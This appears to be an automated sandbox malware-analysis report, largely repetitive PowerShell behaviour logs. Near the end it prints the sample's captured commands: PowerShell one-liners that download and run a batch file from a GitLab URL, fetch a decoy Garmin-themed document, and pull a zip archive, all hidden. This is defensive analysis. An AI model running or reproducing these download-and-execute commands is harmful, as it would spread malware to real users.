Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3984	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5865	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3622	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6167	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3936	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2242	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5129	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4603	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5716	Thread sleep count: 3984 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5716	Thread sleep count: 5865 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1020	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5896	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5880	Thread sleep count: 3622 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5880	Thread sleep count: 6167 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6192	Thread sleep time: -21213755684765971s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5072	Thread sleep count: 3936 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4208	Thread sleep count: 2242 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2940	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3816	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5716	Thread sleep count: 5129 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5440	Thread sleep count: 4603 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 884	Thread sleep time: -20291418481080494s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: powershell.exe, 00000011.00000002.3381960627.000001C871490000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
Source: powershell.exe, 0000000F.00000002.2243795126.00000210F4140000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW3018%SystemRoot%\system32\mswsock.dll0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_6456.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_6520.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6456, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6520, type: MEMORYSTR

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "$h='https://gitlab.com/stare2/garmin/-/raw/main/garsukhjdf11.bat'; $p=$env:TEMP+'\Updates.bat'; iwr $h -OutFile $p;start $p"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Updates.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp.com 437	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\AppData\Local\Temp\Updates.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\AppData\Local\Temp\Updates.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\AppData\Local\Temp\Updates.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\AppData\Local\Temp\Updates.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx')"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V3.docx'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'C:\Users\Public\Document.zip')"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/garmin_campaign_information_for_partners_v3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'c:\users\user\appdata\local\temp\\garmin_campaign_information_for_partners_v3.docx')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'c:\users\public\document.zip')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/garmin_campaign_information_for_partners_v3.docx?rlkey=wuzagfqo68p4k9sn4yxo7i950&st=ss9gx9y8&dl=1', 'c:\users\user\appdata\local\temp\\garmin_campaign_information_for_partners_v3.docx')"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip', 'c:\users\public\document.zip')"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
